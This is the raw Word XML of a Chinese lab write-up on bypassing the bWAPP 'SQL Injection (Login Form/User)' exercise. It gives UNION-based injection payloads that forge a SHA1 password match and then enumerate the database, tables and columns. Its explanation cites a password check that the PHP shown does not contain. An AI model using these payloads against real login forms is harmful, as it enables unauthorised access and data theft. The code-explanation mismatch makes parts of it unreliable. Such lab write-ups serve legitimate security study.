    <w:p w14:paraId="19E084BE" w14:textId="77777777" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码逻辑是先用</w:t>
      </w:r>
      <w:r>
        <w:t>login查询数据然后再查询出的数据中比较看有没有和passwordsha1后相同的账号。通过union带上自己password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555131E2" w14:textId="77777777" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r>
        <w:t>post数据即可登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BC8C3" w14:textId="0961B776" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r>
        <w:t xml:space="preserve">login=a' union select </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10DD79" w14:textId="46B88179" w:rsidR="00EB3504" w:rsidRDefault="003E5308" w:rsidP="003E5308">
      <w:r>
        <w:t>1,2,"356a192b7913b04c54574d18c28d46e6395428ab",4,5,6,7,8,9 %23&amp;password=1&amp;form=submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1747616C" w14:textId="28712BDA" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="00227106"/>
    <w:p w14:paraId="18AC05D7" w14:textId="77777777" w:rsidR="003E5308" w:rsidRDefault="003E5308" w:rsidP="00227106"/>
    <w:p w14:paraId="0DD5278C" w14:textId="62A19FE1" w:rsidR="00EB3504" w:rsidRDefault="00863636" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个题就真的骚了，我搞了好久也没搞出来，直到有一天发现了个大佬！！！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D37B8C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="10C0F9B1" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="491A666B" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection (Login Form/User)，这个注入真的让我崩溃，说好的单引号报错后，相应的改SQL语句，然而并没用，然后求助身边的大牛，他说这个好像不一样，曾经好像是一道CTF的题，和一般的SQL注入不一样，但是一时想不起来怎么秀的了，然后终于想了起来，接着带着我一顿操作，终于明白是怎么回事了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7E52D" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一切都要从代码讲起，先看代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36642241" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A82ED2F" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_POST["form"]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1E82F" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5312F" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $login = $_POST["login"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCB74E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $login = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($login);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311265E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $password = $_POST["password"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9C7E1" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $password = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4075D383" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "SELECT * FROM heroes WHERE login = '" . $login . "' AND password = '" . $password . "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03401B17" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        // echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BF44E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, $link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB841F5" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        if(!$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C73AE1" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642AB2A3" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            die("Error: " . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513FC71" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC86419" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5063E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD7FC4" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            $row = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_fetch_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB7D2A" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            if($row["login"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D6A82" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBC430" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                // $message = "&lt;font color=\"green\"&gt;Welcome " . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($row["login"]) . "...&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C321970" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                $message =  "&lt;p&gt;Welcome &lt;b&gt;" . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">($row["login"]) . "&lt;/b&gt;, how are you today?&lt;/p&gt;&lt;p&gt;Your secret: &lt;b&gt;" . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ucwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($row["secret"]) . "&lt;/b&gt;&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906B9C7" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                // $message = $row["login"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211C3D5" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92B997" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6AF52" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E0B1FB" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">                $message = "&lt;font color=\"red\"&gt;Invalid credentials!&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818D82E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A2910" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876282C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F00643" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D0FDB" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">    echo $message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C62465" w14:textId="296EF662" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EED038" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="6F85369C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从第二行开始，</w:t>
      </w:r>
      <w:r>
        <w:t>$login参数接收传入的login，$password接收传入的password，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($password)这个是设置难度的，这里没有用，接着将password使用sha1方式hash，然后是SQL查询语句，只查询了login，接下来是第15行$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>连接数据库并使用$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询语句，在看if、else语句的else部分，第23行$row取出查询结果的一组作为关联数组，这点很重要，还有下面一点，第25行的判断句“if($row["login"] &amp;&amp; $password == $row["password"])”，这里要使$row["login"]为真而且$password == $row["password"])，这要怎么弄呢，有方法，$row["login"]不是$login，而是查询后存放在$row的login的值，同理第9行$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwrod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和hash值只要等于$row["password"])，所以可以构造SQL语句了，这里比较难受的问题是，你不知道字段数和login和password对应的字段的位置，所以我们需要黑白盒结合起来，打开数据库查询字段和位置，(代码在最</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后附上</w:t>
      </w:r>
      <w:r>
        <w:t>)如图:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CDFED" w14:textId="560E9673" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r w:rsidRPr="00863636">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08AE8AC7" wp14:editId="78DC1F4C">
            <wp:extent cx="5274310" cy="3575050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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3575050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B777E9D" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r>
        <w:t>password在第三个字段处，我们让password的值为“1”，在线MD5一下，找到sha1对应的hash值为“356a192b7913b04c54574d18c28d46e6395428ab”，开始构造查询语句，输入“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240F5A6" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>form=submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111CA604" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>&amp;login=‘ union select 1,2,"356a192b7913b04c54574d18c28d46e6395428ab",4,5,6,7,8,9 #+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319B097" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>&amp;password=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B983FC2" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E91A1" w14:textId="4393E3C0" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r w:rsidRPr="00863636">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B950429" wp14:editId="08F38C35">
            <wp:extent cx="5274310" cy="3616960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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3616960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29105913" wp14:editId="60681EB8">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="91" name="矩形 91" descr="技术分享图片"/>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9A2F7F4" id="矩形 91" o:spid="_x0000_s1026" alt="技术分享图片"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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F46FF" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再详细说下原因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17A620" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将“‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union select 1,2,"356a192b7913b04c54574d18c28d46e6395428ab",4,5,6,7,8,9 #+”赋给login，$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>就成了“$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "SELECT * FROM users WHERE login = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0878B949" w14:textId="789375B5" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>‘" ‘ union select 1,2,"356a192b7913b04c54574d18c28d46e6395428ab",4,5,6,7,8,9 #+"‘";”所以$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>从数据库中搜索就有了返回值，即$row["login"]返回不为空，这里第一个条件就构成了。后面POST的“&amp;password=1”，1的hash的值被我们添加到联合查询语句里了，这样返回的显示中就有1的hash值，即返回的查询有1的hash值，如此$row["password"]的值就是我们传入到password位置的1的hash值了，这样$password的值就等于$row["password"]，所以第25行的if判断语句就为真了，是不是很有意思。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68DCE5" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面就是正常的</w:t>
      </w:r>
      <w:r>
        <w:t>SQL查询了，我也跟着在来一遍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EEF995" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>1、查询数据库等信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52F52C" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入“</w:t>
      </w:r>
      <w:r>
        <w:t>login=‘ union select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9B267" w14:textId="4B9462F0" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>1,group_concat(database(),"||",version(),"||",user()),"356a192b7913b04c54574d18c28d46e6395428ab",4,5,6,7,8,9 #+”，结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DFB20" w14:textId="7EBB273B" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="447524AB" w14:textId="1CD0DA86" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r w:rsidRPr="00863636">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135C1882" wp14:editId="7A0A880B">
            <wp:extent cx="5274310" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="254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609850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47CF12" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>2、查询表名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DC84A" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入“</w:t>
      </w:r>
      <w:r>
        <w:t>login=‘ union select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DFB437" w14:textId="45C9AADB" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t xml:space="preserve">1,group_concat(database(),"||",version(),"||",user()),"356a192b7913b04c54574d18c28d46e6395428ab",4,table_name,6,7,8,9 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bwapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>‘ #+”，可以看见表名为“Blog”并且还有一个“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”数据库，可以自己尝试一下，结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6111712E" w14:textId="249CD5BF" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r w:rsidRPr="00863636">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC0B3DD" wp14:editId="47251120">
            <wp:extent cx="5274310" cy="2388870"/>
            <wp:effectExtent l="0" t="0" r="254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388870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="372514D4" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="752FCB52" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>3、查询字段名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45981248" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">login=‘ union select 1,group_concat(database(),"||",version(),"||",user()),"356a192b7913b04c54574d18c28d46e6395428ab",4,column_name,6,7,8,9 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=‘Blog‘ #+”，结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760239FB" w14:textId="6FB6CB45" w:rsidR="00863636" w:rsidRDefault="00242270" w:rsidP="00863636">
      <w:r w:rsidRPr="00242270">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A11B53" wp14:editId="4D4881BE">
            <wp:extent cx="5274310" cy="2394585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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394585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CEA968" w14:textId="77777777" w:rsidR="00242270" w:rsidRDefault="00242270" w:rsidP="00863636"/>
    <w:p w14:paraId="4E774C9E" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>4、查询字段的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C31BBE" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入“</w:t>
      </w:r>
      <w:r>
        <w:t>login=‘ union select 1,group_concat(database(),"||",version(),"||",user()),"356a192b7913b04c54574d18c28d46e6395428ab",4,id,6,7,8,9 from Blog #+”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C39C4" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="0110E3B5" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFC3F83" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636"/>
    <w:p w14:paraId="0B1D7D9B" w14:textId="77777777" w:rsidR="00863636" w:rsidRDefault="00863636" w:rsidP="00863636">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
